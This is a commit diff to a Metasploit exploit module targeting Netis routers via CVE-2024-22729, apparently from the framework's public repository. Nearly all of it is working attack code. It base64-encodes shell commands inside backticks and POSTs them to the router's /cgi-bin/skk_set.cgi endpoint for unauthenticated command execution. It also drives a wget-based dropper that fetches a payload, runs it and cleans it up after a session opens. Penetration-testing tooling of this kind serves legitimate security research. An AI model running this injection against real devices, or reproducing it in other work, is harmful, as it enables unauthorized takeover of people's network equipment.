Update based on bwatters-r7 comments

h00die-gr3y · May 27, 2024 · e7d65fe · e7d65fe
1 parent 66a7fbf
commit e7d65fe
Showing 1 changed file with 14 additions and 17 deletions.
diff --git a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
@@ -72,20 +72,14 @@ def initialize(info = {})
   end
 
   def execute_command(cmd, _opts = {})
-    # This is a customised linux dropper that only works with the wget command
-    # - payload need to be split because command chaining using ';' does not work
-    # - each command needs to be executed seperately
-    # - time between execution of each command need to be at least 30 seconds or more to avoid a lock
-    app_random = Rex::Text.rand_text_alphanumeric(4..8)
-    cmd_array = cmd.split(';')
-    cmd_array.each_with_index do |command, i|
-      # use the filedropper logic to remove the payload file
-      register_file_for_cleanup(command) if i == 2
-      # skip the manual remove
-      break if i == 3
+    # store name of payload and cleanup payload file when session is established (see def on_new_session)
+    @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
 
-      payload = Base64.strict_encode64("`#{command}`")
-      print_status("Executing #{command}")
+    # skip last command to remove payload becuase it does not work
+    unless cmd.include?('rm -f')
+      app_random = Rex::Text.rand_text_alphanumeric(4..8)
+      payload = Base64.strict_encode64("`#{cmd}`")
+      print_status("Executing #{cmd}")
       send_request_cgi({
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
@@ -95,12 +89,15 @@ def execute_command(cmd, _opts = {})
           'app' => app_random
         }
       })
-      # POST request does not return any output to test
-      # so wait (default 30 sec) before executing the next command to avoid a lock
-      sleep(datastore['CMD_DELAY'])
     end
   end
 
+  def on_new_session(_session)
+    # cleanup payload file
+    register_files_for_cleanup(@payload_name.to_s)
+    super
+  end
+
   def check
     print_status("Checking if #{peer} can be exploited.")
     res = send_request_cgi({
@@ -139,7 +136,7 @@ def exploit
     when :linux_dropper
       # Don't check the response here since the server won't respond
       # if the payload is successfully executed
-      execute_cmdstager
+      execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])
     end
   end
 end